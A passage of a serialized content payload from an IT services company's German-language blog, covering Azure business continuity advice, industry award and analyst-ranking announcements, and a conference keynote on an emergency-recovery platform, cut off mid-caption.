verschärfen sich die Anforderungen an betriebliche Resilienz und Wiederanlaufstrategien. Entscheidend ist nicht nur, ob du einen BCDR-Plan hast – sondern wie belastbar und testbar er ist.",[353,13103,13104],{},"In beiden Fällen gilt:",[2179,13106,13107],{},[353,13108,13109],{},"Verantwortung liegt beim Management – inklusive persönlicher Haftung bei Versäumnissen.",[2548,13111,13113],{"id":13112},"azure-als-technologische-grundlage-für-bcdr-strategien","Azure als technologische Grundlage für BCDR-Strategien",[353,13115,9352],{},[353,13117,13118],{},"Microsoft Azure bietet ein umfassendes Set an Tools, um moderne BCDR-Architekturen umzusetzen. Entscheidend ist die Fähigkeit, diese gezielt und abgestuft einzusetzen – je nach Kritikalität und Risikoprofil der jeweiligen Workloads.",[629,13120,13122],{"id":13121},"schlüsselkomponenten","Schlüsselkomponenten:",[353,13124,10713],{},[353,13126,13127],{},[433,13128,13129],{},"Availability Zones & Region Pairs",[367,13131,13132,13135],{},[370,13133,13134],{},"Physisch getrennte Rechenzentren innerhalb einer Region",[370,13136,13137],{},"Hohe Verfügbarkeiten durch redundante Infrastruktur",[353,13139,13140],{},[433,13141,13142],{},"Azure Backup & Cross Region Restore",[367,13144,13145,13148],{},[370,13146,13147],{},"Sicherung von VMs, Datenbanken und Workloads mit Geo-Redundanz",[370,13149,13150],{},"Wiederherstellung auch außerhalb der Primärregion möglich",[353,13152,13153],{},[433,13154,13155],{},"Azure Site Recovery",[367,13157,13158,13161],{},[370,13159,13160],{},"Replikation und orchestriertes Failover von VMs zwischen Regionen",[370,13162,13163],{},"Failover-Tests in isolierten Umgebungen",[353,13165,13166],{},[433,13167,13168],{},"Infrastructure as Code (IaC)",[367,13170,13171,13174],{},[370,13172,13173],{},"Automatisierte Wiederherstellung ganzer Infrastrukturen",[370,13175,13176],{},"Konsistente Deployments, Versionierbarkeit, Recovery-Templates",[353,13178,13179],{},[433,13180,13181],{},"Microsoft Defender for Cloud",[367,13183,13184,13187],{},[370,13185,13186],{},"Kontinuierliches Monitoring und Schwachstellen-Management",[370,13188,13189],{},"Frühzeitige Erkennung und automatisierte Reaktionen auf Angriffe",[2548,13191,13193],{"id":13192},"kein-bcdr-ohne-testbarkeit","Kein BCDR ohne Testbarkeit",[353,13195,9352],{},[353,13197,13198],{},"Ein Disaster-Recovery-Plan ist nur so gut wie der letzte erfolgreiche Test. In der Praxis zeigt sich oft: Pläne existieren – sind aber weder aktuell noch realitätsnah erprobt.",[353,13200,13201],{},[433,13202,13203],{},"Empfehlung:",[367,13205,13206,13209,13212],{},[370,13207,13208],{},"BCDR-Pläne als Teil der IT-Governance etablieren",[370,13210,13211],{},"Zuständigkeiten klar definieren (auch außerhalb der IT)",[370,13213,13214],{},"Wiederherstellungsszenarien regelmäßig testen – auch mit Fachbereichen",[2548,13216,13218],{"id":13217},"fazit-ein-belastbarer-plan-ist-kein-nice-to-have-sondern-pflicht","Fazit: Ein belastbarer Plan ist kein Nice-to-have – sondern Pflicht",[353,13220,9352],{},[353,13222,13223],{},"BCDR ist kein Produkt, sondern ein Prozess. Es geht nicht um die eine perfekte Lösung, sondern um eine risikobasierte Strategie, abgestimmt auf deine Applikationslandschaft, regulatorische Anforderungen und unternehmerischen Zielsetzungen.",[353,13225,13226],{},"Azure liefert die technologischen Grundlagen – aber die Entscheidung, sie richtig einzusetzen, beginnt auf C-Level.",[353,13228,13229],{},[433,13230,13231],{},"Denn die Frage ist nicht, ob ein Ausfall kommt. Sondern ob du vorbereitet bist, wenn er eintritt.",{"title":402,"searchDepth":403,"depth":403,"links":13233},[13234,13235,13236,13239,13240],{"id":13075,"depth":403,"text":13076},{"id":13087,"depth":403,"text":13088},{"id":13112,"depth":403,"text":13113,"children":13237},[13238],{"id":13121,"depth":704,"text":13122},{"id":13192,"depth":403,"text":13193},{"id":13217,"depth":403,"text":13218},{"seoTitle":13242,"titleClass":7896,"date":13243,"categories":13244,"blogtitlepic":13245,"socialimg":13246,"customExcerpt":13247,"keywords":13248,"footer":13249,"contactInContent":13250,"scripts":13269},"Business Continuity & Disaster Recovery mit Azure: So machst du dein Unternehmen krisenfest","2025-04-07",[1773],"head-bcdr-management.png","/blog/heads/head-bcdr-management.png","Moderne IT ist vernetzt, verteilt, komplex – und oft anfälliger, als man denkt. Business Continuity und Disaster Recovery sind kein IT-Luxus mehr, sondern Grundvoraussetzung für Resilienz. Die Frage ist nicht, ob etwas passiert. Sondern wie gut du vorbereitet bist, wenn es passiert.","Business Continuity, Disaster Recovery, BCDR, Microsoft Azure, Azure Backup, Azure Site Recovery, Hochverfügbarkeit Cloud, Ausfallsicherheit IT, Infrastruktur als Code, NIS2, DORA, Compliance, IT-Krisenmanagement, Cloud-Strategie, Azure BCDR, Notfallplanung IT, IT-Sicherheit, Cloud Resilienz, Ausfall Absicherung, Recovery Plan",{"noMargin":415},{"quote":415,"infos":13251},{"bgColor":12128,"headline":13013,"subline":13014,"level":2548,"textStyling":9489,"flush":9490,"person":13252,"form":13256},{"image":13016,"cloudinary":415,"alt":265,"name":265,"quotee":265,"quoteeTitle":13017,"quote":13018,"detailsHeader":10135,"details":13253},[13254,13255],{"text":9499,"href":9500,"details":9501,"icon":9502},{"text":9492,"href":10436,"icon":9506},{"ctaText":9508,"cta":13257,"method":407,"action":9511,"fields":13258},{"skin":9510},[13259,13260,13261,13262,13263,13264,13265,13266,13267,13268],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":10143},{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":10145},{"label":9522,"type":9523,"id":9523,"required":415,"requiredMsg":10147},{"label":13029,"type":13030,"id":13031,"required":415,"requiredMsg":13032},{"label":13034,"type":9527,"id":9528,"required":415,"requiredMsg":9529},{"type":9531,"id":13036,"value":1773},{"type":9531,"id":13038,"value":13039},{"type":9531,"id":9532,"value":13041},{"type":9531,"id":9535,"value":10153},{"type":9531,"id":9538},{"slick":415},"/posts/2025-04-07-bcdr-management",{"title":13060,"description":13066},"posts/2025-04-07-bcdr-management",[1773,13274,13055],"BCDR","QXjl-VUPY4r13ri6-KDq8gndF_85SY8cRQMOy-rRLYc",{"id":13277,"title":13278,"author":13279,"body":13280,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":13336,"moment":13337,"navigation":415,"path":13344,"seo":13345,"stem":13346,"tags":13347,"webcast":406,"__hash__":13348},"content_de/posts/2025-04-29-rsa-mssp-2025.md","glueckkanja weiterhin unter den Top 5 MSSPs weltweit",[191],{"type":350,"value":13281,"toc":13332},[13282,13286,13288,13291,13294,13297,13300,13311,13314,13317,13320,13324,13326,13329],[2548,13283,13285],{"id":13284},"dreimal-in-folge-glueckkanja-zählt-zur-security-elite","Dreimal in Folge: glueckkanja zählt zur Security-Elite",[353,13287,9352],{},[353,13289,13290],{},"Zum dritten Mal in Folge gehören wir zu den fünf besten Managed Microsoft Security Providern weltweit. Ein Triple, über das wir uns riesig freuen. CEO Christian Kanja und Security Lead Jan Geisbauer waren persönlich in San Francisco vor Ort, um diese Auszeichnung gemeinsam mit der Microsoft Intelligent Security Association (MISA) und der internationalen Security-Community zu feiern. RSA, Golden Gate Bridge, roter Teppich – alles dabei.",[353,13292,13293],{},"Und weil Innovation nicht nur auf der Bühne stattfindet, haben Christian und Jan auch Zukunftsluft geschnuppert: im selbstfahrenden Taxi durch die Straßen von San Francisco. Ohne Fahrer, aber mit jeder Menge Begeisterung – ein Erlebnis, das perfekt zum Spirit der RSA passte. Genau das ist auch unser Anspruch in der Cybersecurity: Vertrauen entsteht, wenn Systeme halten, was sie versprechen.",[353,13295,13296],{},"Die Microsoft Security Excellence Awards gehören zu den wichtigsten Auszeichnungen der Branche. Sie würdigen Partner, die mit Innovation und Servicequalität Standards setzen. Dass wir 2025 erneut als einer der besten Managed Security Service Provider ausgezeichnet wurden, ist eine besondere Bestätigung unserer Arbeit – und ein Meilenstein für unser gesamtes Team.",[353,13298,13299],{},"Was uns dahin gebracht hat:",[367,13301,13302,13305,13308],{},[370,13303,13304],{},"87 % unserer Kunden bewerten unsere technische Expertise auf höchstem Niveau",[370,13306,13307],{},"94 % loben unsere 24/7-Services",[370,13309,13310],{},"100 % sind mit der Gesamterfahrung zufrieden",[353,13312,13313],{},"Starke Ergebnisse, die zeigen: Als Team leisten wir Außergewöhnliches.",[353,13315,13316],{},"Ein großes Dankeschön an alle, die diesen Erfolg möglich gemacht haben – an Microsoft und die Microsoft Intelligent Security Association (MISA) für die enge Partnerschaft und das Vertrauen, an unsere Kunden für ihre Treue und an unser CSOC-Team, das Tag für Tag Spitzenleistung bringt.",[353,13318,13319],{},"In einer starken Security-Community arbeiten die besten Köpfe zusammen – und genau diese Zusammenarbeit treibt uns weiter an.",[2548,13321,13323],{"id":13322},"der-blick-nach-vorn","Der Blick nach vorn",[353,13325,9352],{},[353,13327,13328],{},"Dieser Award ist für uns Ansporn und Verpflichtung zugleich. Wir bleiben dran: mit Innovation, Leidenschaft und dem Anspruch, Microsoft-Sicherheitslösungen auf höchstem Niveau bereitzustellen. Gemeinsam mit Microsoft, unseren Kunden und Partnern schreiben wir das nächste Kapitel unserer Erfolgsgeschichte.",[353,13330,13331],{},"glueckkanja – Security auf Champions-League-Niveau.",{"title":402,"searchDepth":403,"depth":403,"links":13333},[13334,13335],{"id":13284,"depth":403,"text":13285},{"id":13322,"depth":403,"text":13323},{"seoTitle":13278,"titleClass":7896,"date":13337,"categories":13338,"blogtitlepic":12903,"socialimg":12904,"customExcerpt":13339,"keywords":12906,"hreflang":13340,"scripts":13343},"2025-04-29",[410],"Die Microsoft Security Excellence Awards gehören zu den bedeutendsten Auszeichnungen der Branche. Auf der RSA Conference 2025 in San Francisco wurden erneut Partner geehrt, die mit Innovation, Servicequalität und Engagement Maßstäbe setzen. Dass glueckkanja 2025 wieder als Finalist bei den „Security MSSP of the Year Awards“ ausgezeichnet wurde, freut uns riesig – und ist ein starkes Zeichen für die Arbeit, die unser gesamtes Team jeden Tag leistet.",[13341,13342],{"lang":2118,"href":12909},{"lang":9114,"href":12911},{"slick":415},"/posts/2025-04-29-rsa-mssp-2025",{"title":13278,"description":402},"posts/2025-04-29-rsa-mssp-2025",[3933,422,1117,9332],"qJoeeOUV2zx9qs4ZL46QmQHMQ8v-0Adogq_DYF5tN38",{"id":13350,"title":13351,"author":13352,"body":13353,"cta":3,"description":13357,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":13444,"moment":13446,"navigation":415,"path":13497,"seo":13498,"stem":13499,"tags":13500,"webcast":406,"__hash__":13501},"content_de/posts/2025-05-08-isg-germany-2025.md","Vier gewinnt. glueckkanja erneut Leader bei ISG",[191],{"type":350,"value":13354,"toc":13437},[13355,13358,13361,13365,13367,13370,13374,13376,13381,13386,13390,13392,13397,13402,13406,13408,13413,13418,13422,13424,13429,13434],[353,13356,13357],{},"Einmal ist keinmal, sagt man. Zweimal ist doppelt gut, und erst beim Triple geht’s mit dem Zählen los. So gesehen gehören wir seit diesem Jahr zum Establishment der ISG Provider Lens™-Studie: Denn glueckkanja wurde nach 2021, 2023 und 2024 auch 2025 wieder als Leader im Bereich Microsoft 365 Services und Managed Azure ausgezeichnet.",[353,13359,13360],{},"Als langjähriger Microsoft-Partner bringen wir Unternehmen weltweit in die Cloud – strategisch, sicher und immer mit einem klaren Blick aufs Machbare. Damit leisten wir einen wichtigen Beitrag zur globalen IT-Sicherheit und fördern den innovativen Fortschritt in einer Vielzahl von Geschäftsfeldern. Wir freuen uns, dass diese Leistung auch 2025 erneut von der ISG-Studie anerkannt wurde.",[2548,13362,13364],{"id":13363},"isg-provider-lens-studie-2025","ISG Provider Lens™ Studie 2025",[353,13366,9352],{},[353,13368,13369],{},"Mit der \"Microsoft Cloud Ecosystem\"-Studie liefert ISG im Rahmen seiner Provider Lens™-Reihe fundierte Einblicke, die Unternehmen bei ihrer strategischen Ausrichtung – von der Positionierung über Partnerschaften bis hin zu Go-to-Market-Ansätzen – unterstützen. Dabei werden die Leistungen der einzelnen Anbieter auf Basis ihres Produktportfolios und ihrer Wettbewerbsfähigkeit in Bezug auf das Microsoft Cloud-Ökosystem bewertet und in die vier Quadranten Product Challenger, Contender, Market Challenger und Leader eingeteilt. So viel zur Studie selbst – kommen wir jetzt zu unseren Studienergebnissen!",[2548,13371,13373],{"id":13372},"glueckkanja-ist-leader-microsoft-365-services-midmarket","glueckkanja ist Leader Microsoft 365 Services (Midmarket)",[353,13375,9352],{},[353,13377,13378],{},[356,13379],{"alt":9710,"src":13380},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-m365-services-midmarket.png",[353,13382,13383],{},[748,13384,13385],{},"\"glueckkanja treibt die Cloud-Transformation voran, integriert Microsoft 365 und Windows 365 effizient und setzt auf Automatisierung, um IT-Prozesse zu optimieren und die Sicherheit zu gewährleisten!\"",[2548,13387,13389],{"id":13388},"glueckkanja-ist-leader-microsoft-365-services-large-accounts","glueckkanja ist Leader Microsoft 365 Services (Large Accounts)",[353,13391,9352],{},[353,13393,13394],{},[356,13395],{"alt":9661,"src":13396},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-m365-services-large-accounts.png",[353,13398,13399],{},[748,13400,13401],{},"\"glueckkanja optimiert komplexe IT-Landschaften, integriert Microsoft 365 und Windows 365 nahtlos und setzt auf Automatisierung für maximale Skalierbarkeit, Sicherheit und Effizienz.\"",[2548,13403,13405],{"id":13404},"glueckkanja-ist-leader-managed-services-for-azure-midmarket","glueckkanja ist Leader Managed Services for Azure (Midmarket)",[353,13407,9352],{},[353,13409,13410],{},[356,13411],{"alt":9626,"src":13412},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-managed-services-for-azure-midmarket.png",[353,13414,13415],{},[748,13416,13417],{},"\"glueckkanja ermöglicht sichere, skalierbare Cloud-Strukturen, die Risiken minimieren und die Effizienz steigern. Durch Automatisierung und vorausschauende Governance gewinnen Unternehmen Stabilität, Kontrolle und Zukunftssicherheit.\"",[2548,13419,13421],{"id":13420},"glueckkanja-ist-leader-managed-services-for-azure-large-accounts","glueckkanja ist Leader Managed Services for Azure (Large Accounts)",[353,13423,9352],{},[353,13425,13426],{},[356,13427],{"alt":9581,"src":13428},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-managed-services-for-azure-large-accounts.png",[353,13430,13431],{},[748,13432,13433],{},"\"glueckkanja gestaltet die Cloud-Zukunft mit Automatisierung, Governance und Nachhaltigkeit. Durch Infrastructure as Code und iterative Optimierung entstehen resiliente, skalierbare und wirtschaftlich effiziente Lösungen.\"",[353,13435,13436],{},"An dieser Stelle sagen wir herzlich Danke für das viele Lob. Wenn du Lust hast, tiefer in die Studienergebnisse einzutauchen, sag einfach Bescheid – wir schicken dir gerne die vollständige ISG-Übersicht zu.",{"title":402,"searchDepth":403,"depth":403,"links":13438},[13439,13440,13441,13442,13443],{"id":13363,"depth":403,"text":13364},{"id":13372,"depth":403,"text":13373},{"id":13388,"depth":403,"text":13389},{"id":13404,"depth":403,"text":13405},{"id":13420,"depth":403,"text":13421},{"seoTitle":13445,"titleClass":7896,"date":13446,"categories":13447,"blogtitlepic":13448,"socialimg":13449,"customExcerpt":13450,"keywords":13451,"hreflang":13452,"footer":13457,"contactInContent":13458,"textImageTeaser":13485},"ISG 2025: glueckkanja erneut Leader für Managed Services for Azure und Microsoft 365 Services","2025-05-08",[410],"head-isg-2025.png","/blog/heads/head-isg-2025.png","Die ISG Provider Lens™-Studie 2025 bestätigt glueckkanja erneut als Leader in den Kategorien Managed Services for Azure und Microsoft 365 Services. Ausgezeichnet wurde in beiden Marktsegmenten: Midmarket und Large Accounts. Damit bestätigt sich, was sich in den letzten Jahren abgezeichnet hat: Wer Standardisierung, Automatisierung und Skalierung für Microsoft-Umgebungen ernst meint, kommt an glueckkanja nicht vorbei.","Microsoft Partner Deutschland, Managed Services Azure Deutschland, Microsoft 365 Services Deutschland, IT Dienstleister Deutschland, Cloud Services Deutschland, ISG Provider Lens Deutschland, glueckkanja Deutschland, Microsoft Cloud Deutschland, ISG Leader 2025, IT Sicherheit Deutschland, Digitalisierung Unternehmen Deutschland, Azure Services Deutschland, Microsoft 365 Beratung Deutschland, glueckkanja, glueckkanja Microsoft Services, ISG Auszeichnung Microsoft",[13453,13455],{"lang":2118,"href":13454},"/blog/corporate/2025/05/isg-germany-2025-en",{"lang":9114,"href":13456},"/blog/corporate/2025/05/isg-germany-2025-es",{"noMargin":415},{"quote":415,"infos":13459},{"bgColor":12128,"headline":13460,"subline":13461,"level":2548,"textStyling":9489,"flush":9490,"person":13462,"form":13469},"Studie anfordern","Du möchtest tiefer in die Studienergebnisse eintauchen? Dann melde dich gern bei uns – wir schicken dir die vollständige ISG-Übersicht mit unseren Skills und Stärken zu.",{"image":13463,"cloudinary":415,"alt":144,"name":144,"quotee":144,"quoteeTitle":13464,"quote":13465,"detailsHeader":10135,"details":13466},"/people/people-michael-breither.jpg","COO","Die wiederholte Auszeichnung durch ISG bestätigt unseren Kurs: standardisierte, skalierbare Services für Microsoft-Plattformen – mit echtem Mehrwert für unsere Kunden.",[13467,13468],{"text":9499,"href":9500,"details":9501,"icon":9502},{"text":9492,"href":10436,"icon":9506},{"ctaText":9508,"cta":13470,"method":407,"action":9511,"fields":13471},{"skin":9510},[13472,13473,13474,13475,13477,13478,13479,13481,13483,13484],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":10143},{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":10145},{"label":9522,"type":9523,"id":9523,"required":415,"requiredMsg":10147},{"label":13476,"type":13030,"id":13031,"required":406,"requiredMsg":13032},"Deine Nachricht an uns",{"label":13034,"type":9527,"id":9528,"required":415,"requiredMsg":9529},{"type":9531,"id":13036,"value":410},{"type":9531,"id":13038,"value":13480},"DE",{"type":9531,"id":9532,"value":13482},"Form: Blog ISG Germany | DE",{"type":9531,"id":9535,"value":10153},{"type":9531,"id":9538},{"image":13486,"cloudinary":415,"alt":13487,"bgColor":7610,"offset":406,"list":13488,"left":406,"float":406,"firstColWidth":13492,"secondColWidth":13493,"copyClasses":13494,"headline":13495,"subline":13496,"spacing":7606},"/logos/isg-provider-lens-rising-star-ch.png","ISG Provider Lens",[13489],{"ctaText":13490,"ctaHref":13491,"ctaType":8004},"Mehr Infos","/de/blog/corporate/2025/05/isg-switzerland-2025",5,7,"richtext","\u003Cp>Übrigens, in der Schweiz sind wir Rising Star!\u003Cbr />Merci, ISG!\u003C/p>","\u003Cp>Erfahre jetzt alles über unsere ISG-Ergebnisse in der Schweiz.\u003C/p>","/posts/2025-05-08-isg-germany-2025",{"title":13351,"description":13357},"posts/2025-05-08-isg-germany-2025",[3933,6430],"-FxlssZQlIvdt6RfxOvtP8dy872U21CeFXYNkdntLqg",{"id":13503,"title":13504,"author":13505,"body":13506,"cta":3,"description":13510,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":13563,"moment":13446,"navigation":415,"path":13607,"seo":13608,"stem":13609,"tags":13610,"webcast":406,"__hash__":13611},"content_de/posts/2025-05-08-isg-switzerland-2025.md","Schweiz legt nach. glueckkanja wird ISG Rising Star",[191],{"type":350,"value":13507,"toc":13558},[13508,13511,13514,13516,13518,13521,13525,13527,13533,13538,13542,13544,13550,13555],[353,13509,13510],{},"Bern ist bekannt für seine beeindruckende Altstadt, den Zeitglockenturm, das Bundeshaus – und natürlich den Rosengarten. Jetzt kommt ein neues Highlight dazu: glueckkanja Schweiz wurde in der aktuellen ISG Provider Lens™-Studie als „Rising Star“ ausgezeichnet – für unsere Microsoft 365 Services und Managed Services for Azure.",[353,13512,13513],{},"Seit 2024 sind wir mit glueckkanja auch in Bern vor Ort. Als erfahrener Microsoft-Partner begleiten wir von dort aus Schweizer Unternehmen in die Cloud – strategisch, sicher und mit einem klaren Blick aufs Machbare. So stärken wir seit rund zwölf Monaten die IT-Sicherheit im Schweizer Wirtschaftsraum und bringen Innovation in verschiedenste Branchen. Umso mehr freut es uns, dass unsere Arbeit nun auch von der ISG Provider Lens™ gewürdigt wurde.",[2548,13515,13364],{"id":13363},[353,13517,9352],{},[353,13519,13520],{},"Mit der \"Microsoft Cloud Ecosystem\"-Studie liefert ISG im Rahmen seiner Provider Lens™-Reihe fundierte Einblicke, die Unternehmen bei ihrer strategischen Ausrichtung – von der Positionierung über Partnerschaften bis hin zu Go-to-Market-Ansätzen – unterstützen. Dabei werden die Leistungen der einzelnen Anbieter auf Basis ihres Produktportfolios und ihrer Wettbewerbsfähigkeit in Bezug auf das Microsoft Cloud-Ökosystem bewertet und in die vier Quadranten Product Challenger, Contender, Market Challenger und Leader eingeteilt. So viel zur Theorie – jetzt zu unseren Ergebnissen!",[2548,13522,13524],{"id":13523},"glueckkanja-ist-rising-star-microsoft-365-services","glueckkanja ist Rising Star Microsoft 365 Services",[353,13526,9352],{},[353,13528,13529],{},[356,13530],{"alt":13531,"src":13532},"Microsoft 365 Services","https://res.cloudinary.com/c4a8/image/upload/blog/pics/Microsoft_365_Services.png",[353,13534,13535],{},[748,13536,13537],{},"\"glueckkanja unterstützt Schweizer Unternehmen bei der sicheren Cloud-Transformation, integriert Microsoft 365 und Windows 365 und optimiert IT-Prozesse durch Automatisierung und Skalierbarkeit.\"",[2548,13539,13541],{"id":13540},"glueckkanja-ist-rising-star-managed-services-for-azure","glueckkanja ist Rising Star Managed Services for Azure",[353,13543,9352],{},[353,13545,13546],{},[356,13547],{"alt":13548,"src":13549},"Managed Services for Azure","https://res.cloudinary.com/c4a8/image/upload/v1746721421/blog/pics/Managed_Services_for_Azure.png",[353,13551,13552],{},[748,13553,13554],{},"\"glueckkanja ist ein Rising Star im Schweizer Markt für Managed Services für Azure. Mit technologischem Weitblick, lokaler Präsenz und bewiesener Leistungsfähigkeit stärkt das Unternehmen Security, Automatisierung und Skalierbarkeit für zukunftssichere Cloud-Strategien.\"",[353,13556,13557],{},"Dafür sagen wir „Merci vielmals\" und stoßen jetzt mit einem Bärner Müntschi darauf an. Solltest du Lust haben, tiefer in die Studienergebnisse einzusteigen, findest du hier eine komplette ISG-Übersicht unserer Skills und Stärken.",{"title":402,"searchDepth":403,"depth":403,"links":13559},[13560,13561,13562],{"id":13363,"depth":403,"text":13364},{"id":13523,"depth":403,"text":13524},{"id":13540,"depth":403,"text":13541},{"seoTitle":13564,"titleClass":7896,"date":13446,"categories":13565,"blogtitlepic":13566,"socialimg":13567,"customExcerpt":13568,"keywords":13569,"hreflang":13570,"footer":13575,"contactInContent":13576,"textImageTeaser":13600},"glueckkanja Schweiz als ISG „Rising Star“ 2025 für Microsoft 365 & Azure Services",[410],"head-isg-ch-2025.png","/blog/heads/head-isg-ch-2025.png","glueckkanja Schweiz wurde von ISG als „Rising Star“ in den Kategorien Microsoft 365 Services und Managed Services for Azure ausgezeichnet. Eine Anerkennung, die zeigt: Unsere Standards, unser Anspruch und unsere Services setzen Maßstäbe – auch über Grenzen hinweg.","Microsoft Partner Schweiz, Managed Services Azure Schweiz, Microsoft 365 Services Schweiz, IT Dienstleister Schweiz, Cloud Services Schweiz, ISG Provider Lens Schweiz, glueckkanja Schweiz, Microsoft Cloud Schweiz, Rising Star ISG 2025, IT Sicherheit Schweiz, Digitalisierung Unternehmen Schweiz, Azure Services Bern, Microsoft 365 Beratung Schweiz, glueckkanja, glueckkanja Bern, glueckkanja Microsoft Services",[13571,13573],{"lang":2118,"href":13572},"/blog/corporate/2025/05/isg-switzerland-2025-en",{"lang":9114,"href":13574},"/blog/corporate/2025/05/isg-switzerland-2025-es",{"noMargin":415},{"quote":415,"infos":13577},{"bgColor":12128,"headline":13460,"subline":13461,"level":2548,"textStyling":9489,"flush":9490,"person":13578,"form":13585},{"image":13463,"cloudinary":415,"alt":144,"name":144,"quotee":144,"quoteeTitle":13464,"quote":13579,"detailsHeader":10135,"details":13580},"Die Rising Star-Auszeichnung zeigt, dass unser Ansatz auch in der Schweiz überzeugt: standardisierte, sichere Microsoft-Services – pragmatisch umgesetzt und mit echtem Mehrwert für unsere Kunden.",[13581,13584],{"text":13582,"href":13583,"details":9501,"icon":9502},"+41 31 5611900","tel:+41 31 5611900",{"text":9492,"href":10436,"icon":9506},{"ctaText":9508,"cta":13586,"method":407,"action":9511,"fields":13587},{"skin":9510},[13588,13589,13590,13591,13592,13593,13594,13596,13598,13599],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":10143},{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":10145},{"label":9522,"type":9523,"id":9523,"required":415,"requiredMsg":10147},{"label":13476,"type":13030,"id":13031,"required":406,"requiredMsg":13032},{"label":13034,"type":9527,"id":9528,"required":415,"requiredMsg":9529},{"type":9531,"id":13036,"value":410},{"type":9531,"id":13038,"value":13595},"CH",{"type":9531,"id":9532,"value":13597},"Form: Blog ISG Switzerland | DE",{"type":9531,"id":9535,"value":10153},{"type":9531,"id":9538},{"image":13601,"cloudinary":415,"alt":13487,"bgColor":7610,"offset":406,"list":13602,"left":406,"float":406,"firstColWidth":13492,"secondColWidth":13493,"copyClasses":13494,"headline":13605,"subline":13606,"spacing":7606},"/logos/isg-provider-lens-leader-de.png",[13603],{"ctaText":13490,"ctaHref":13604,"ctaType":8004},"/blog/corporate/2025/05/isg-germany-2025","\u003Cp>Übrigens, in Deutschland sind wir Leader in den Bereichen Microsoft 365 und Managed Azure!\u003Cbr />Danke, ISG!\u003C/p>","\u003Cp>Erfahre jetzt alles über unsere ISG-Ergebnisse in Deutschland.\u003C/p>","/posts/2025-05-08-isg-switzerland-2025",{"title":13504,"description":13510},"posts/2025-05-08-isg-switzerland-2025",[3933,6430],"h1i40LJ22B8luU71OCteszkmVMtndNU3mrMORjgAmjA",{"id":13613,"title":13614,"author":13615,"body":13616,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":13783,"moment":13785,"navigation":415,"path":13816,"seo":13817,"stem":13818,"tags":13819,"webcast":406,"__hash__":13820},"content_de/posts/2025-05-25-tech-conference-2025.md","Wien. Microsoft. Wir. – Auf der techConference 2025.",[191],{"type":350,"value":13617,"toc":13778},[13618,13622,13624,13627,13636,13645,13649,13651,13658,13661,13664,13667,13701,13704,13730,13733,13737,13739,13746,13749,13772,13775],[2548,13619,13621],{"id":13620},"warum-techconference","Warum techConference?",[353,13623,9352],{},[353,13625,13626],{},"Am 3. und 4. Juni 2025 wird Wien zum Hotspot für Tech-Innovation – und wir sind mittendrin. Als Platinum Partner der techConference 2025 zeigen wir nicht nur Präsenz, sondern setzen ein klares Zeichen: für Resilienz, für Cloud-Infrastruktur made in Austria und für eine Partnerschaft mit Microsoft, die mehr kann als Buzzwords.",[353,13628,13629,13630,13635],{},"Im Zentrum unseres Auftritts: ",[374,13631,13634],{"href":13632,"rel":13633},"https://www.glueckkanja.com/de/azure/azure-emergency-response-environment",[378],"Azure Emergency Response Environment (AzERE)"," – unsere Plattform für Azure Emergency Response Environments. Sie ermöglicht Unternehmen, im Ernstfall blitzschnell wieder handlungsfähig zu sein. Ob Ransomware, Systemausfall oder Kommunikationsbruch: AzERE bringt kritische Prozesse und Identitäten in kürzester Zeit zurück in den Betrieb. In unserer Keynote zeigen wir das live – gemeinsam mit Christoph Schacher, CISO von Wienerberger, der aus erster Hand berichtet, wie AzERE zum Game-Changer in seiner Sicherheitsstrategie wurde.",[353,13637,13638,13639,13644],{},"Gleichzeitig fällt auf der techConference auch der Startschuss für eine neue Ära: ",[374,13640,13643],{"href":13641,"rel":13642},"https://www.glueckkanja.com/de/azure/azure-goes-austria",[378],"der Launch der Microsoft Cloudregion Österreich",". Wir freuen uns, offizieller Launchpartner zu sein – und unterstützen Unternehmen dabei, diese Infrastruktur ab dem ersten Tag effizient und sicher zu nutzen. Das bedeutet: Datenhaltung in Österreich, Compliance-by-Design, noch schnellere Performance – und ein starkes Signal für digitale Souveränität im Land.",[2548,13646,13648],{"id":13647},"wenn-alles-ausfällt-zählt-nur-eins-geschwindigkeit","Wenn alles ausfällt, zählt nur eins: Geschwindigkeit.",[353,13650,9352],{},[353,13652,13653,13654,13657],{},"Am ",[433,13655,13656],{},"4. Juni (Tag 2) um 9 Uhr im Raum Terminator"," zeigen wir in unserer Keynote auf der techConference, wie Unternehmen in der Krise handlungsfähig bleiben. Nicht theoretisch – sondern mit System.",[353,13659,13660],{},"AzERE ist unsere Antwort auf den Worst Case: Eine Plattform, mit der kritische Prozesse und Kommunikation nach einem Angriff in Minuten wieder anlaufen. Kein Reboot, kein Rätselraten – sondern ein klarer Plan für den Ernstfall.",[353,13662,13663],{},"Auf der Bühne: Jan Geisbauer und Florian Stöckl, die zeigen, wie AzERE funktioniert. Und Christoph Schacher, CISO von Wienerberger, der erklärt, warum sein Unternehmen genau darauf setzt – und wie daraus ein strategischer Vorteil wurde.",[10832,13665,13666],{},"\n    body {\n      margin: 0;\n      background-color: #f9f9f9;\n    }\n\n    .gallery-container {\n      display: grid;\n      grid-template-columns: repeat(3, 1fr);\n      gap: 20px;\n      padding: 10px;\n      max-width: 600px;\n    }\n\n    .gallery-container img {\n      width: 100%;\n      height: 100%;\n      object-fit: cover;\n    }\n\n    .gallery-item {\n      display: flex;\n      flex-direction: column;\n    }\n\n    .caption {\n      margin-top: 10px;\n      font-size: 16px;\n      text-align: center;\n    }\n  ",[2559,13668,2557,13671,2557,13683,2557,13692,8923],{"className":13669},[13670],"gallery-container",[2559,13672,6703,13675,6703,13678,2557],{"className":13673},[13674],"gallery-item",[356,13676],{"src":13677,"alt":219},"https://res.cloudinary.com/c4a8/image/upload/events/christoph-schacher.jpg",[2559,13679,13682],{"className":13680},[13681],"caption","Christoph 